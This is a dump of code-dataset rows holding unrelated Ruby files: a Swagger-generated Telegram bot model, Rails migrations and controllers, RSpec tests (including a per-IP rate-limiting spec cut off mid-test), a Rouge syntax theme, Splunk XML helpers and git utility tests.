hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
=begin
#Telegram bot API
#This is a swagger definition for [Telegram bot API](https://core.telegram.org/bots/api).
OpenAPI spec version: 3.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'date'
module Teleswagger
# Swagger-generated model for the Telegram Bot API type
# InlineQueryResultArticle (see the type names in .swagger_types).
# Provides hash <-> object (de)serialization helpers used by the client.
class InlineQueryResultArticle
  # Declared types for each attribute are listed in .swagger_types below.
  attr_accessor :type
  attr_accessor :id
  attr_accessor :title
  attr_accessor :input_message_content
  attr_accessor :reply_markup
  attr_accessor :url
  attr_accessor :hide_url
  attr_accessor :description
  attr_accessor :thumb_url
  attr_accessor :thumb_width
  attr_accessor :thumb_height

  # Attribute mapping from ruby-style variable name to JSON key.
  def self.attribute_map
    {
      :'type' => :'type',
      :'id' => :'id',
      :'title' => :'title',
      :'input_message_content' => :'input_message_content',
      :'reply_markup' => :'reply_markup',
      :'url' => :'url',
      :'hide_url' => :'hide_url',
      :'description' => :'description',
      :'thumb_url' => :'thumb_url',
      :'thumb_width' => :'thumb_width',
      :'thumb_height' => :'thumb_height'
    }
  end

  # Attribute type mapping.
  def self.swagger_types
    {
      :'type' => :'InlineType',
      :'id' => :'String',
      :'title' => :'String',
      :'input_message_content' => :'Object',
      :'reply_markup' => :'InlineKeyboardMarkup',
      :'url' => :'String',
      :'hide_url' => :'BOOLEAN',
      :'description' => :'String',
      :'thumb_url' => :'String',
      :'thumb_width' => :'Integer',
      :'thumb_height' => :'Integer'
    }
  end

  # Initializes the object
  # @param [Hash] attributes Model attributes in the form of hash
  def initialize(attributes = {})
    return unless attributes.is_a?(Hash)
    # convert string to symbol for hash key
    attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
    if attributes.has_key?(:'type')
      self.type = attributes[:'type']
    end
    if attributes.has_key?(:'id')
      self.id = attributes[:'id']
    end
    if attributes.has_key?(:'title')
      self.title = attributes[:'title']
    end
    if attributes.has_key?(:'input_message_content')
      self.input_message_content = attributes[:'input_message_content']
    end
    if attributes.has_key?(:'reply_markup')
      self.reply_markup = attributes[:'reply_markup']
    end
    if attributes.has_key?(:'url')
      self.url = attributes[:'url']
    end
    if attributes.has_key?(:'hide_url')
      self.hide_url = attributes[:'hide_url']
    end
    if attributes.has_key?(:'description')
      self.description = attributes[:'description']
    end
    if attributes.has_key?(:'thumb_url')
      self.thumb_url = attributes[:'thumb_url']
    end
    if attributes.has_key?(:'thumb_width')
      self.thumb_width = attributes[:'thumb_width']
    end
    if attributes.has_key?(:'thumb_height')
      self.thumb_height = attributes[:'thumb_height']
    end
  end

  # Show invalid properties with the reasons. Usually used together with valid?
  # NOTE(review): always returns an empty list even though valid? can be
  # false — the generator never filled this in; rely on valid? instead.
  # @return Array for valid properies with the reasons
  def list_invalid_properties
    invalid_properties = Array.new
    return invalid_properties
  end

  # Check to see if the all the properties in the model are valid
  # Required fields (per the checks below): type, id, title,
  # input_message_content.
  # @return true if the model is valid
  def valid?
    return false if @type.nil?
    return false if @id.nil?
    return false if @title.nil?
    return false if @input_message_content.nil?
    return true
  end

  # Checks equality by comparing each attribute.
  # @param [Object] Object to be compared
  def ==(o)
    return true if self.equal?(o)
    self.class == o.class &&
      type == o.type &&
      id == o.id &&
      title == o.title &&
      input_message_content == o.input_message_content &&
      reply_markup == o.reply_markup &&
      url == o.url &&
      hide_url == o.hide_url &&
      description == o.description &&
      thumb_url == o.thumb_url &&
      thumb_width == o.thumb_width &&
      thumb_height == o.thumb_height
  end

  # @see the `==` method
  # @param [Object] Object to be compared
  def eql?(o)
    self == o
  end

  # Calculates hash code according to all attributes.
  # @return [Fixnum] Hash code
  def hash
    [type, id, title, input_message_content, reply_markup, url, hide_url, description, thumb_url, thumb_width, thumb_height].hash
  end

  # Builds the object from hash
  # @param [Hash] attributes Model attributes in the form of hash
  # @return [Object] Returns the model itself
  def build_from_hash(attributes)
    return nil unless attributes.is_a?(Hash)
    self.class.swagger_types.each_pair do |key, type|
      if type =~ /^Array<(.*)>/i
        # check to ensure the input is an array given that the the attribute
        # is documented as an array but the input is not
        if attributes[self.class.attribute_map[key]].is_a?(Array)
          self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
        end
      elsif !attributes[self.class.attribute_map[key]].nil?
        self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
      end # or else data not found in attributes(hash), not an issue as the data can be optional
    end
    self
  end

  # Deserializes the data based on type
  # @param string type Data type
  # @param string value Value to be deserialized
  # @return [Object] Deserialized data
  def _deserialize(type, value)
    case type.to_sym
    when :DateTime
      DateTime.parse(value)
    when :Date
      Date.parse(value)
    when :String
      value.to_s
    when :Integer
      value.to_i
    when :Float
      value.to_f
    when :BOOLEAN
      # anything matching true/t/yes/y/1 (case-insensitive) is truthy
      if value.to_s =~ /^(true|t|yes|y|1)$/i
        true
      else
        false
      end
    when :Object
      # generic object (usually a Hash), return directly
      value
    when /\AArray<(?<inner_type>.+)>\z/
      inner_type = Regexp.last_match[:inner_type]
      value.map { |v| _deserialize(inner_type, v) }
    when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/
      k_type = Regexp.last_match[:k_type]
      v_type = Regexp.last_match[:v_type]
      {}.tap do |hash|
        value.each do |k, v|
          hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
        end
      end
    else # model
      # delegate to the named model class in this namespace
      temp_model = Teleswagger.const_get(type).new
      temp_model.build_from_hash(value)
    end
  end

  # Returns the string representation of the object
  # @return [String] String presentation of the object
  def to_s
    to_hash.to_s
  end

  # to_body is an alias to to_hash (backward compatibility)
  # @return [Hash] Returns the object in the form of hash
  def to_body
    to_hash
  end

  # Returns the object in the form of hash
  # @return [Hash] Returns the object in the form of hash
  def to_hash
    hash = {}
    self.class.attribute_map.each_pair do |attr, param|
      value = self.send(attr)
      next if value.nil?
      hash[param] = _to_hash(value)
    end
    hash
  end

  # Outputs non-array value in the form of hash
  # For object, use to_hash. Otherwise, just return the value
  # @param [Object] value Any valid value
  # @return [Hash] Returns the value in the form of hash
  def _to_hash(value)
    if value.is_a?(Array)
      value.compact.map{ |v| _to_hash(v) }
    elsif value.is_a?(Hash)
      {}.tap do |hash|
        value.each { |k, v| hash[k] = _to_hash(v) }
      end
    elsif value.respond_to? :to_hash
      value.to_hash
    else
      value
    end
  end
end
end
| 28.758503 | 131 | 0.615967 |
# Migration creating the comics table: one row per comic file on disk,
# keyed to a title via title_id (no FK constraint is declared here).
class CreateComics < ActiveRecord::Migration[6.1]
  def change
    create_table :comics do |t|
      t.string :full_path, null: false # absolute/relative file location; required
      t.integer :size                  # file size — units not declared here; presumably bytes
      t.integer :issue_number
      t.integer :pub_year
      t.integer :pub_month
      t.string :extension              # file extension, e.g. from the path
      t.integer :title_id              # reference to the owning title record
      t.timestamps null: false
    end
  end
end
| 21.3125 | 49 | 0.648094 |
# Specs for FinishTaskService#execute: finishing the n-th uncompleted
# task in a chat's list, covering missing-list / missing-task /
# out-of-range / success paths. Expected messages come from I18n keys.
describe TodoBot::Tasks::FinishTaskService do
  let(:service) { described_class.new(args) }
  let(:args) { {user: user, chat: chat, number: number} }
  let(:user) { create(:user) }
  # 1-based task position, overridden per context below
  let(:number) { 1 }

  describe '#execute' do
    subject { service.execute }

    context 'when chat doesn`t contain list' do
      let(:chat) { create(:chat) }
      it { is_expected.to eq I18n.t('list.not_exists') }
    end

    context 'when chat contains list' do
      let(:chat) { create(:chat, :with_list) }
      let(:list) { chat.lists.first }

      context 'when list doesn`t contain tasks' do
        it { is_expected.to eq I18n.t('task.not_found') }
      end

      context 'when list contains tasks' do
        before do
          list.tasks.create(name: '1', user: user)
          list.tasks.create(name: '2', user: user)
        end

        context 'when number of finished task out of tasks range' do
          let(:number) { 3 }
          it { is_expected.to eq I18n.t('task.not_found') }
        end

        context 'when number of finishing task in tasks range' do
          # remaining uncompleted tasks rendered via the presenter
          let(:tasks) { TodoBot::CollectionToMessagePresenter.new(list.tasks.uncompleted).execute }
          it { is_expected.to eq "#{I18n.t('task.finished', task: '1')}\n\n#{tasks}" }
        end
      end
    end
  end
end
| 28.911111 | 99 | 0.601845 |
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

# Nested (rather than compact `module A::B`) form so loading this file
# does not require the parent namespaces to be defined first.
module Azure
  module SQL
    module Mgmt
      module V2014_04_01
        module Models
          #
          # Defines values for GeoBackupPolicyState
          #
          module GeoBackupPolicyState
            # Frozen so these shared string constants cannot be mutated
            # by callers.
            Disabled = "Disabled".freeze
            Enabled = "Enabled".freeze
          end
        end
      end
    end
  end
end
| 22.5625 | 70 | 0.706371 |
# Booking-wizard step in which a visitor picks up to three visit slots
# (option_0..option_2). Options are ISO8601-ish strings parsed via
# ConcreteSlot; bookability is checked against processor-provided
# constraints.
class SlotsStep
  include MemoryModel

  attribute :processor, :steps_processor
  attribute :review_slot, :string          # index ("0".."2") of a slot being re-reviewed
  attribute :currently_filling, :string    # index of the slot the user is editing
  attribute :skip_remaining_slots, :boolean
  attribute :option_0, :string
  attribute :option_1, :string
  attribute :option_2, :string

  before_validation :reorder_options

  # Each present option must both parse as a ConcreteSlot and be
  # bookable under the current constraints.
  validates_each :option_0, :option_1, :option_2,
                 allow_blank: true do |record, attr, value|
    begin
      slot = ConcreteSlot.parse(value) # rescue ArgumentError false
    rescue ArgumentError
      record.errors.add(attr, 'is not a parseable slot')
    end
    if slot && !record.slot_constraints.bookable_slot?(slot)
      record.errors.add(attr, 'is not a bookable slot')
    end
  end

  validates :option_0, presence: true

  delegate :bookable_slots?, :unavailability_reasons, to: :slot_constraints

  # Shift option_2 into the option_1 gap so chosen slots stay contiguous.
  def reorder_options
    if option_0.present? && option_1.blank? && option_2.present?
      self.option_1 = option_2
      self.option_2 = nil
    end
  end

  def skip_remaining_slots?
    errors.empty? && skip_remaining_slots == true
  end

  # Whether the wizard should offer another slot-selection screen.
  def options_available?
    if skip_remaining_slots? || just_reviewed_slot? ||
        currently_filling_slot_left_blank? || !available_bookable_slots?
      false
    else
      next_slot_to_fill ? true : false
    end
  end

  def just_reviewed_slot?
    review_slot.present? && currently_filling.present? &&
      review_slot == currently_filling
  end

  def currently_filling_slot_left_blank?
    currently_filling.present? && send("option_#{currently_filling}").blank?
  end

  # All present options parsed into ConcreteSlot objects.
  def slots
    options.map { |s| ConcreteSlot.parse(s) }
  end

  # Present options that passed validation, parsed into ConcreteSlots.
  def valid_options
    %i[option_0 option_1 option_2].
      reject { |o| errors.key?(o) }.
      map { |o| send(o) }.
      reject(&:blank?).
      map { |o| ConcreteSlot.parse(o) }
  end

  def options
    [option_0, option_1, option_2].select(&:present?)
  end

  def slot_constraints
    @slot_constraints ||= processor.booking_constraints.on_slots
  end

  # Index ("0".."2") of the next option to ask for, or nil when all
  # three are chosen. Restarts at "0" if any chosen slot became unbookable.
  def next_slot_to_fill
    return '0' if unbookable_slots_selected?
    return review_slot if review_slot.present?
    slots_select_count = valid_options.size
    return nil if slots_select_count == 3
    slots_select_count.to_s
  end

  # True when at least one bookable slot remains that isn't already chosen.
  def available_bookable_slots?
    return true if option_0.blank?
    slot_constraints.
      bookable_slots.
      map { |cs| cs.slot.iso8601 }.
      reject { |s| s.in?(options) }.
      any?
  end

  def unable_to_add_more_slots?
    !skip_remaining_slots && !available_bookable_slots?
  end

  # Whether any currently selected option is no longer bookable
  # (constraints may have changed since selection).
  def unbookable_slots_selected?
    options.map { |o| ConcreteSlot.parse(o) }.any? do |slot|
      !slot_constraints.bookable_slot?(slot)
    end
  end
end
| 24.36036 | 76 | 0.698964 |
# CocoaPods specification for the ValidationNEL Swift library.
Pod::Spec.new do |spec|
  spec.name = "ValidationNEL"
  spec.version = "0.2.0"
  spec.summary = "A Swift implementation of ValidationNEL: accumulating more than one failure."
  spec.homepage = "https://github.com/Hxucaa/ValidationNEL"
  spec.license = { type: 'MIT', file: 'LICENSE' }
  spec.authors = { "Lance Zhu" => '[email protected]' }
  # Minimum deployment targets per Apple platform.
  spec.ios.deployment_target = "8.0"
  spec.osx.deployment_target = "10.9"
  spec.tvos.deployment_target = "9.1"
  spec.watchos.deployment_target = "2.1"
  spec.requires_arc = true
  # Tag is derived from the version above so the two stay in sync.
  spec.source = { git: "https://github.com/Hxucaa/ValidationNEL.git", tag: "v#{spec.version}", submodules: true }
  spec.source_files = "Sources/**/*.{h,swift}"
  spec.dependency "Swiftz", "~> 0.5.0"
end
| 36.6 | 113 | 0.684426 |
# frozen_string_literal: true
require "zeitwerk"
module DevOrbit
  # Wire up Zeitwerk autoloading for this gem: constants are resolved
  # from files under this directory, tagged with the gem's file name.
  Zeitwerk::Loader.new.tap do |zeitwerk|
    zeitwerk.tag = File.basename(__FILE__, ".rb")
    zeitwerk.push_dir(__dir__)
    zeitwerk.setup
  end
end
| 17.363636 | 45 | 0.748691 |
# -*- coding: utf-8 -*- #
# frozen_string_literal: true
module Rouge
module Themes
# A port of the pastie style from Pygments.
# See https://bitbucket.org/birkenfeld/pygments-main/src/default/pygments/styles/pastie.py
# A port of the pastie style from Pygments.
# See https://bitbucket.org/birkenfeld/pygments-main/src/default/pygments/styles/pastie.py
# Each `style` call maps a Rouge token class to foreground/background
# colors and font attributes.
class Pastie < CSSTheme
  name 'pastie'

  style Comment, :fg => '#888888'
  style Comment::Preproc, :fg => '#cc0000', :bold => true
  style Comment::Special, :fg => '#cc0000', :bg => '#fff0f0', :bold => true

  style Error, :fg => '#a61717', :bg => '#e3d2d2'
  style Generic::Error, :fg => '#aa0000'

  style Generic::Heading, :fg => '#333333'
  style Generic::Subheading, :fg => '#666666'

  style Generic::Deleted, :fg => '#000000', :bg => '#ffdddd'
  style Generic::Inserted, :fg => '#000000', :bg => '#ddffdd'

  style Generic::Emph, :italic => true
  style Generic::Strong, :bold => true

  style Generic::Lineno, :fg => '#888888'
  style Generic::Output, :fg => '#888888'
  style Generic::Prompt, :fg => '#555555'
  style Generic::Traceback, :fg => '#aa0000'

  style Keyword, :fg => '#008800', :bold => true
  style Keyword::Pseudo, :fg => '#008800'
  style Keyword::Type, :fg => '#888888', :bold => true

  style Num, :fg => '#0000dd', :bold => true

  style Str, :fg => '#dd2200', :bg => '#fff0f0'
  style Str::Escape, :fg => '#0044dd', :bg => '#fff0f0'
  style Str::Interpol, :fg => '#3333bb', :bg => '#fff0f0'
  style Str::Other, :fg => '#22bb22', :bg => '#f0fff0'
  #style Str::Regex, :fg => '#008800', :bg => '#fff0ff'
  # The background color on regex really doesn't look good, so let's drop it
  style Str::Regex, :fg => '#008800'
  style Str::Symbol, :fg => '#aa6600', :bg => '#fff0f0'

  style Name::Attribute, :fg => '#336699'
  style Name::Builtin, :fg => '#003388'
  style Name::Class, :fg => '#bb0066', :bold => true
  style Name::Constant, :fg => '#003366', :bold => true
  style Name::Decorator, :fg => '#555555'
  style Name::Exception, :fg => '#bb0066', :bold => true
  style Name::Function, :fg => '#0066bb', :bold => true
  #style Name::Label, :fg => '#336699', :italic => true
  # Name::Label is used for built-in CSS properties in Rouge, so let's drop italics
  style Name::Label, :fg => '#336699'
  style Name::Namespace, :fg => '#bb0066', :bold => true
  style Name::Property, :fg => '#336699', :bold => true
  style Name::Tag, :fg => '#bb0066', :bold => true
  style Name::Variable, :fg => '#336699'
  style Name::Variable::Global, :fg => '#dd7700'
  style Name::Variable::Instance, :fg => '#3333bb'

  style Operator::Word, :fg => '#008800'

  # Plain text: inherit default styling.
  style Text, {}
  style Text::Whitespace, :fg => '#bbbbbb'
end
end
end
| 47.464789 | 95 | 0.465282 |
require 'jackal-stacks'

module Jackal
  module Stacks
    module Formatter
      # Format result for slack notification
      class Slack < Jackal::Formatter

        # Source service
        SOURCE = 'stacks'
        # Destination service
        DESTINATION = 'slack'

        # Stack lifecycle results that trigger a notification.
        NOTIFY_ON = %w(created updated destroyed)

        # Format payload
        #
        # Appends a Slack message describing the stack event to
        # payload[:data][:slack][:messages] when the stacks result
        # includes one of the NOTIFY_ON keys. No-op otherwise.
        #
        # @param payload [Smash]
        def format(payload)
          if(payload.get(:data, :stacks))
            # set intersection keeps only recognized event keys
            unless((notify = payload.fetch(:data, :stacks, {}).keys & NOTIFY_ON).empty?)
              msgs = payload.fetch(:data, :slack, :messages, [])
              msgs << Smash.new(
                :description => "Stacks result: #{notify.first}",
                :message => [
                  "Stack has been #{notify.first} [name: #{payload.get(:data, :stacks, :name)}]",
                  "* Template: #{payload.get(:data, :stacks, :template)}",
                  "* Repository: #{payload.get(:data, :code_fetcher, :info, :owner)}/#{payload.get(:data, :code_fetcher, :info, :name)}",
                  "* Reference: #{payload.get(:data, :code_fetcher, :info, :reference)}",
                  "* SHA: #{payload.get(:data, :code_fetcher, :info, :commit_sha)}"
                ].join("\n"),
                :color => :good
              )
              payload.set(:data, :slack, :messages, msgs)
            end
          end
        end

      end
    end
  end
end
| 32.659091 | 137 | 0.512178 |
# Handles login and logout for the application.
class SessionsController < ApplicationController
  # Renders the login form.
  def new
  end

  # Authenticates the submitted credentials and, on success, starts a
  # session and redirects to the user's page; otherwise re-renders the
  # form with a flash message.
  def create
    credentials = params[:session]
    user = User.find_by(email: credentials[:email].downcase)
    if user&.authenticate(credentials[:password])
      log_in user
      redirect_to user
    else
      flash.now[:danger] = 'Invalid email/password combination'
      render 'new'
    end
  end

  # Ends the current session and returns to the home page.
  def destroy
    log_out
    redirect_to root_url
  end
end
| 19.904762 | 65 | 0.674641 |
# Drops the owned_shows column from users.
# NOTE(review): without the column type, this `remove_column` cannot be
# reversed by `rails db:rollback` — confirm whether reversibility matters.
class RemoveOwnedShowsFromUsers < ActiveRecord::Migration[5.0]
  def change
    remove_column :users, :owned_shows
  end
end
| 20.833333 | 62 | 0.776 |
d5afa91b1619b06435572b5c71489a0fc6b03afc | 119 | class AddToContainerType < ActiveRecord::Migration
def change
add_column :container_types, :label, :string
end
end
| 19.833333 | 50 | 0.798319 |
# Class represents a lono option that is possibly callable. Examples:
#
# config.allow.envs
# config.allow.regions
# config.deny.envs
# config.deny.regions
#
# Abstraction is definitely obtuse. Using it to get rid of duplication.
#
class Lono::App
class CallableOption
include Lono::Utils::Logging
def initialize(options={})
@options = options
# Example:
# config_name: config.allow.envs
# config_value: ["dev"]
# args: [@stack_name] # passed to object.call
@config_name = options[:config_name]
@config_value = options[:config_value]
@passed_args = options[:passed_args]
end
# Returns either an Array or nil
def object
case @config_value
when nil
return nil
when Array
return @config_value
when -> (c) { c.respond_to?(:public_instance_methods) && c.public_instance_methods.include?(:call) }
object= @config_value.new
when -> (c) { c.respond_to?(:call) }
object = @config_value
else
raise "Invalid option for #{@config_name}"
end
if object
result = @passed_args.empty? ? object.call : object.call(*@passed_args)
unless result.is_a?(Array) || result.is_a?(NilClass)
message = "ERROR: The #{@config_name} needs to return an Array or nil"
logger.info message.color(:yellow)
logger.info <<~EOL
The #{@config_name} when assigned a class, object, or proc must implement
the call method and return an Array or nil.
The current return value is a #{result.class}
EOL
raise message
end
end
result
end
end
end
| 29.964912 | 106 | 0.618267 |
require "mkmf"
# Generates the Makefile that builds the rubyraw native extension.
create_makefile("rubyraw/rubyraw")
| 12.75 | 34 | 0.784314 |
# encoding: utf-8
# frozen_string_literal: true
require_relative 'keys'
module TTY
  class Reader
    # Metadata about a pressed key: symbolic name plus ctrl/meta/shift
    # modifier flags, all defaulting to "not set".
    #
    # @api private
    class Key < Struct.new(:name, :ctrl, :meta, :shift)
      def initialize(*)
        super(nil, false, false, false)
      end
    end

    # A single keyboard event: the raw character read plus its Key
    # metadata.
    #
    # @api public
    class KeyEvent < Struct.new(:value, :key)
      # Build a key event from the character read off the input stream.
      #
      # @param [Hash[Symbol]] keys
      #   the mapping of raw input codes to key names
      # @param [String] char
      #   the raw character(s) read
      #
      # @return [KeyEvent]
      #
      # @api public
      def self.from(keys, char)
        metadata = Key.new
        # fall back to :ignore when the code has no registered name
        metadata.name = keys[char] || :ignore
        case char
        when /^[a-z]{1}$/
          metadata.name = :alpha
        when /^[A-Z]{1}$/
          metadata.name = :alpha
          metadata.shift = true
        when /^\d+$/
          metadata.name = :num
        when proc { |cs| !Keys.ctrl_keys[cs].nil? }
          metadata.ctrl = true
        end
        new(char, metadata)
      end

      # Whether this event carries enough information to be dispatched.
      #
      # @return [Boolean]
      #
      # @api public
      def trigger?
        !(key.nil? || key.name.nil?)
      end
    end # KeyEvent
  end # Reader
end # TTY
| 23.1 | 61 | 0.520202 |
require 'simplecov'
# Start coverage collection before the code under test is loaded.
SimpleCov.start do
  add_filter '/spec/'
  add_group 'Codeception', 'lib/guard'
end

require 'rspec'
require 'guard/codeception'
require 'coveralls'
# Report coverage results to Coveralls.
Coveralls.wear!

RSpec.configure do |config|
  config.treat_symbols_as_metadata_keys_with_true_values = true
  config.run_all_when_everything_filtered = true
  config.order = :random
  # `fit`/`:focus` runs only focused examples.
  config.filter_run :focus
end
| 22.1 | 66 | 0.68552 |
#--
# Copyright 2011-2013 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#++
# :enddoc:
##
# Control which XML parsing library the Splunk SDK for Ruby uses.
#
# The Splunk SDK for Ruby can use either REXML (the default library that
# ships with Ruby 1.9) or Nokogiri (a binding around the C library +libxml2+).
# Which library it tries is determined by the +$defualt_xml_library+ global
# variable.
#
# By default, this module will try to set the library to Nokogiri, and, if
# that is unavailable, will fall back to REXML. The library can be selected
# explicitly (in which case it will not use the fail back behavior) by calling
# +require_xml_library+ (which you should use in preference to setting
# +$splunk_xml_library+ manually, since it also takes care of checking that
# the library loads properly).
#
# You can also specify the environment variable +$RUBY_XML_LIBRARY+ in the shell
# to choose the default library. The two values are +"rexml"+ and +"nokogiri"+
# (note that they are not case sensitive). If you specify this environment
# variable, the SDK will not attempt to fall back to REXML in the absence of
# Nokogiri.
module Splunk
  ##
  # Tell the Splunk SDK for Ruby to use _library_ for XML parsing.
  #
  # The only two supported libraries for now are Nokogiri (pass +:nokogiri+ as
  # the _library_ parameter) and REXML (pass +:rexml+).
  #
  # Arguments:
  # * _library_: (+:nokogiri+ or +:rexml:+) A symbol specifying the library.
  #
  # Raises:
  # * +LoadError+ if the library requested cannot be loaded.
  #
  # Returns no value of interest.
  #
  def self.require_xml_library(library)
    if library == :nokogiri
      require 'nokogiri'
      $splunk_xml_library = :nokogiri
    else
      require 'rexml/document'
      require 'rexml/streamlistener'
      $splunk_xml_library = :rexml
    end
  end

  # In the absence of any other call to +require_xml_library+, we try to use
  # Nokogiri, and if that doesn't work, we fall back to REXML, which is shipped
  # with Ruby 1.9, and should always be there.
  begin
    require 'nokogiri'
    $splunk_xml_library = :nokogiri
  rescue LoadError
    require 'rexml/document'
    require 'rexml/streamlistener'
    $splunk_xml_library = :rexml
  end

  ##
  # Returns the text contained in the first element matching _xpath_ in _text_.
  #
  # Arguments:
  # * _xpath_: (+String+) An XPath specifier. It should refer to an element
  #   containing only text, not additional XML elements.
  # * _text_: (+String+) The text to search in.
  #
  # Returns: A +String+ containing the text in the first match of _xpath_,
  # or +nil+ if there was no match.
  #
  # NOTE(review): under Nokogiri this returns the content of the *last*
  # match (+matches.last+), while the REXML branch inspects the first —
  # the results differ when _xpath_ matches more than one element;
  # confirm which behavior callers rely on.
  #
  # *Examples*:
  #
  #     text_at_xpath("/set/entry", "<set><entry>Boris</entry></set>")
  #       == "Boris"
  #     text_at_xpath("/a", "<a>Alpha</a> <a>Beta</a>") == "Alpha"
  #     text_at_xpath("/a", "<b>Quill pen</b>") == nil
  #
  def self.text_at_xpath(xpath, text)
    if text.nil? or text.length == 0
      return nil
    elsif $splunk_xml_library == :nokogiri
      doc = Nokogiri::XML(text)
      matches = doc.xpath(xpath)
      if matches.empty?
        return nil
      else
        return matches.last.content
      end
    else
      doc = REXML::Document.new(text)
      matches = doc.elements[xpath]
      if matches
        # first child of the matched element should be its text node
        return matches[0].value
      else
        return nil
      end
    end
  end

  ##
  # Escape reserved XML entities in a string.
  #
  # To match the behavior of splunkd, we only escape &, <, and >, not single
  # and double quotes. This means we have to write the behavior ourselves,
  # since both REXML and Nokogiri also escape both kinds of quotes.
  #
  # The ampersand must be escaped first so the entities introduced for
  # < and > are not themselves re-escaped.
  #
  def self.escape_string(str)
    str.gsub(/&/, "&amp;").gsub(/</, "&lt;").gsub(/>/, "&gt;")
  end
end
| 32.976744 | 80 | 0.682652 |
ff468ca7b783ccfbc77c4045514c97d5685499dc | 184 | class CreateItems < ActiveRecord::Migration[5.2]
def change
create_table :items do |t|
t.string :name
t.string :description
t.integer :box_id
end
end
end
| 18.4 | 48 | 0.652174 |
require 'test_helper'

# Unit tests for MindTheChanges::Git: shell-command wrappers are stubbed
# via mocha's `expects(:`)` so no real git repository is needed.
class GitTest < Minitest::Test
  def test_get_tags_sort_by_date_asc
    # raw `git for-each-ref` output; content lines kept flush-left so the
    # heredoc bytes match what the parser receives
    output = <<-EOF
refs/tags/0.0.1 Thu Aug 4 12:34:56 2011 +0200
refs/tags/1.0.0 Fri Aug 5 11:11:11 2011 +0200
refs/tags/1.0.1 Thu Sep 12 21:10:00 2013 +0200
refs/tags/1.1.0 Thu Dec 10 10:10:10 2015 +0200
refs/tags/2.0.0 Fri Dec 11 12:12:12 2015 +0200
    EOF
    # expected entries have the refs/tags/ prefix stripped
    expected = [
      '0.0.1 Thu Aug 4 12:34:56 2011 +0200',
      '1.0.0 Fri Aug 5 11:11:11 2011 +0200',
      '1.0.1 Thu Sep 12 21:10:00 2013 +0200',
      '1.1.0 Thu Dec 10 10:10:10 2015 +0200',
      '2.0.0 Fri Dec 11 12:12:12 2015 +0200'
    ]
    MindTheChanges::Git.expects(:`).with("git for-each-ref --sort=taggerdate --format '%(refname) %(taggerdate)' refs/tags").returns(output).once
    assert_equal(expected, MindTheChanges::Git.get_tags_sort_by_date_asc)
  end

  def test_get_commit_hash
    tag = '1.1.0'
    # trailing newline from the shell must be stripped by the method
    output = "1a2b3c0f0f0f0f0f0f0f0f0f0f0f0f0f0f1a2b3c\n"
    expected = output.strip
    MindTheChanges::Git.expects(:`).with("git rev-list -n 1 #{tag}").returns(output).once
    assert_equal(expected, MindTheChanges::Git.get_commit_hash(tag))
  end

  def test_get_commit_hash_of_head
    output = "1a2b3c0f0f0f0f0f0f0f0f0f0f0f0f0f0f1a2b3c\n"
    expected = output.strip
    MindTheChanges::Git.expects(:`).with("git rev-parse HEAD").returns(output).once
    assert_equal(expected, MindTheChanges::Git.get_commit_hash_of_head)
  end
end
| 37.289474 | 145 | 0.695131 |
# Be sure to restart your server when you modify this file.
# Cookie-based session storage; `key` names the browser session cookie.
HackerspaceLibrary::Application.config.session_store :cookie_store, key: '_hackerspace-library_session'
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rails generate session_migration")
# HackerspaceLibrary::Application.config.session_store :active_record_store
| 49.666667 | 103 | 0.823266 |
require "rails_helper"

# Request specs asserting per-IP throttling on public write endpoints,
# via the shared example "an IP-based rate limited endpoint"
# (limit of 5 requests per 1 minute in every case below).
describe "Rate limiting" do
  include_context "stub types api"
  include_context "stub candidate create access token api"

  # fixed client address so every request counts against one bucket
  let(:ip) { "1.2.3.4" }

  it_behaves_like "an IP-based rate limited endpoint", "POST /csp_reports", 5, 1.minute do
    def perform_request
      post csp_reports_path, params: {}.to_json, headers: { "REMOTE_ADDR" => ip }
    end
  end

  it_behaves_like "an IP-based rate limited endpoint", "PATCH /mailinglist/signup/name", 5, 1.minute do
    def perform_request
      key = MailingList::Steps::Name.model_name.param_key
      params = { key => attributes_for(:mailing_list_name) }
      patch mailing_list_step_path(:name), params: params, headers: { "REMOTE_ADDR" => ip }
    end
  end

  it_behaves_like "an IP-based rate limited endpoint", "GET */resend_verification", 5, 1.minute do
    def perform_request
      get resend_verification_mailing_list_steps_path(redirect_path: "redirect/path"), headers: { "REMOTE_ADDR" => ip }
    end
  end

  it_behaves_like "an IP-based rate limited endpoint", "PATCH */mailinglist/signup/privacy_policy", 5, 1.minute do
    def perform_request
      key = MailingList::Steps::PrivacyPolicy.model_name.param_key
      params = { key => attributes_for(:mailing_list_privacy_policy) }
      patch mailing_list_step_path(:privacy_policy), params: params, headers: { "REMOTE_ADDR" => ip }
    end
  end

  describe "event endpoint rate limiting" do
    let(:readable_event_id) { "123" }

    # stub the events API so the steps controllers can resolve the event
    before do
      event = build(:event_api, readable_id: readable_event_id)
      allow_any_instance_of(GetIntoTeachingApiClient::TeachingEventsApi).to \
        receive(:get_teaching_event).and_return event
    end

    it_behaves_like "an IP-based rate limited endpoint", "PATCH /events/:id/apply/personal_details", 5, 1.minute do
      def perform_request
        key = Events::Steps::PersonalDetails.model_name.param_key
        params = { key => attributes_for(:events_personal_details) }
